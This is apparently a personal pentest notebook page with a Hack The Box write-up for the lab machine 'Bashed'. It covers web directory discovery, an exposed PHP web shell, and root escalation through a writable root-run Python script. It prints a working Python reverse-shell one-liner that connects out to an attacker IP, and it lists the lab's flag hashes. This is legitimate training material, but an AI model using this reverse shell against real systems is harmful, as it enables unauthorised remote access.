Hacking
  • Penetration Testing
  • Methodologies
    • Exfil
    • Manual Enumeration
    • Basic Buffer Overflow
    • Basic Internal Network test
    • Basic Mobile Testing guide
    • Basic Subdomain Enumeration guide
  • Guides
    • Build A Raspberry Pi Dropbox
    • Golang
    • Powershell / PowerView
    • PurpleSharp
  • Hack The Box last updated - 2019
    • Legacy
    • Devel
    • Optimum
    • Popcorn
    • Beep
    • Tenten
    • Arctic
    • Cronos
    • Grandpa
    • Granny
    • October
    • Lazy
    • Sneaky
    • Holiday
    • Blocky
    • Shrek
    • Blue
    • Joker
    • Europa
    • Haircut
    • Bank
    • SolidState
    • Mantis
    • Shocker
    • Tally
    • Sense
    • Jeeves
    • Stratosphere
    • Inception
    • Bashed
    • Fluxcapacitor
    • Canape
    • Rabbit
    • Chatterbox
    • Nibbles
    • Sunday
    • Aragog
    • Valentine
    • Silo
    • Olympus
    • Poison
    • Celestial
    • Waldo
    • Jerry
    • Access
    • Active
    • Netmon
  • scriptz
  • Issues
    • gists
    • Boring Issues
Powered by GitBook
On this page
  • Bashed - 10.10.10.68
  • Ports / Services / Software Versions Running
  • Vulnerability Exploited:
  • Privilege Escalation.
  • Exploiting the host:
  1. Hack The Box last updated - 2019

Bashed

Bashed - 10.10.10.68

Target Enumeration:

OS: Linux

IP: 10.10.10.68

User: 2c281f318555dbc1b856957c7147bfc1

Root: cc4f0afe3a1026d402ba10329674a8e2

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Vulnerability Exploited:

Externally accessible php script which allows remote code execution.

Privilege Escalation.

Writable python file running as root.

Exploiting the host:

Nmap

Dirb found /dev/ which was hosting a phpbash.php script which allowed remote code execution.

The following shell worked:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",2492));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This user was restricted so looking at the /etc/passwd file we found a user

We executed the same reverse shell on port 443 as the user scriptmanager

So now we have a low privileged user as scriptmanager

We found a scripts folder in the root dir

We could see it was running the test.py file as root so we could inject a shell into the test.py file to see if that would give us a reverse root shell on port 444.

Checking the contents of test.py.

After a breif period we found we had a root shell,

PreviousInceptionNextFluxcapacitor

Last updated 6 years ago